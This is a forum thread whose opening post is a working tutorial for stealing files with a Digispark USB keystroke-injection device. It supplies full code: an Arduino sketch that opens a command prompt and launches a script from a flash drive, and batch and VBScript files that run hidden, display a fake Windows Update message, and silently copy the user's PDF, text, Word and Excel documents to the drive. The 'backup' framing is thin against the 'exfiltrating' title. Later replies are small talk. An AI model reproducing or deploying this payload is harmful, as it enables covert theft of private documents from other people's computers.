chevron_left chevron_right
Login Register invert_colors photo_library
Thread Rating:
  • 0 Vote(s) - 0 Average


filter_list Tutorial Exfiltrating files with Digispark
Author
Message
Exfiltrating files with Digispark #1
[Introduction]
Some time ago I wrote a tutorial titled "1$ USB Rubber Ducky alternative", this is somewhat a continuation of that tutorial.
ITT: I'm going to show you how you can use a Digispark and a regular flashdrive to backup files from computers to a flash drive.
For the purpose of this tutorial I will not go trough setting up the Digispark dev enviroment, for that take a look at https://sinister.ly/Thread-Tutorial-1-US...lternative
Quick demo:

Spoiler:



[What you'll need]
* Digispark
* Arduino software
* USB drive
* (Optional) USB hub


[Setting up the flashdrive]
1. Rename your flashdrive to something unique, I named it PK because it's a shorten version of "pika" (You'll be using the name of the flash as a way to find where you want to put your files)
2. Create a cuple of files on the flashdrive:
d.cmd(Blinks the CAPSLOCK LED when started, executes i.vbs):

Spoiler:
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~d0\i.vbs %~d0\e.cmd
@exit
e.cmd (Copies files, blinks the CAPSLOCK LED when done):
Spoiler:
@echo off
@echo Installing Windows Update

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM Documents
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.txt %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.xls %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
i.vbs(Executes e.cmd invisibly):
Spoiler:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

[Setting up the Digispark]
Just flash this code to your Digispark, replace the PK on the 23 line to the name of your flashdrive
Spoiler:
#include "DigiKeyboard.h"

void setup() {
// don't need to set anything up to use DigiKeyboard
}


void loop() {
// this is generally not necessary but with some older systems it seems to
// prevent missing the first character after a delay:
DigiKeyboard.sendKeyStroke(0);

// Open cmd
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print("cmd");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);

// Execute code from the interwebs
DigiKeyboard.print("powershell \".((gwmi win32_volume -f 'label=''PK''').Name+'d.cmd')\"");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
while(true){
  //do nothing
}
}

[Final notes]
Congratulations you're done!
You could use some cheap usb hub to make it use only one port.
The current payload will only take pdf, txt, doc, xlsx files, but you can modify the e.cmd file to add your own extensions, just keep in mind that the more extensions you add, the more time will be needed for the payload to finish its job.


[External links]
The original payload by HAK5: https://www.hak5.org/blog/hak5/stealing-...-explained
Digispark installation: http://digistump.com/wiki/digispark/tuto...connecting
My first Digispark tutorial: https://sinister.ly/Thread-Tutorial-1-US...lternative
[Image: 9H83e18.png]

[+] 1 user Likes Pikami's post
Reply

RE: Exfiltrating files with Digispark #2
It works quite well with very little hassle. I have accumulated computing tasks, who knows If I'll ever get to doing this.

As a side note, what lappy Is It? It looks like an Acer Predator (but Isn't), or perhaps an Asus ROG.

Reply

RE: Exfiltrating files with Digispark #3
(10-12-2017, 02:58 PM)mothered Wrote: As a side note, what lappy Is It? It looks like an Acer Predator (but Isn't), or perhaps an Asus ROG.

Lenovo Y520
[Image: 9H83e18.png]

Reply

RE: Exfiltrating files with Digispark #4
(10-12-2017, 03:05 PM)Pikami Wrote: Lenovo Y520

Now that I've searched It via Google Images, It looks quite appealing. I've actually just changed the colors on my backlit keyboard to half green/red. It seems to Illuminate better In the dark.

On topic, thanks again for the contribution. I may have time to check It out this weekend.

Reply






Users browsing this thread: 1 Guest(s)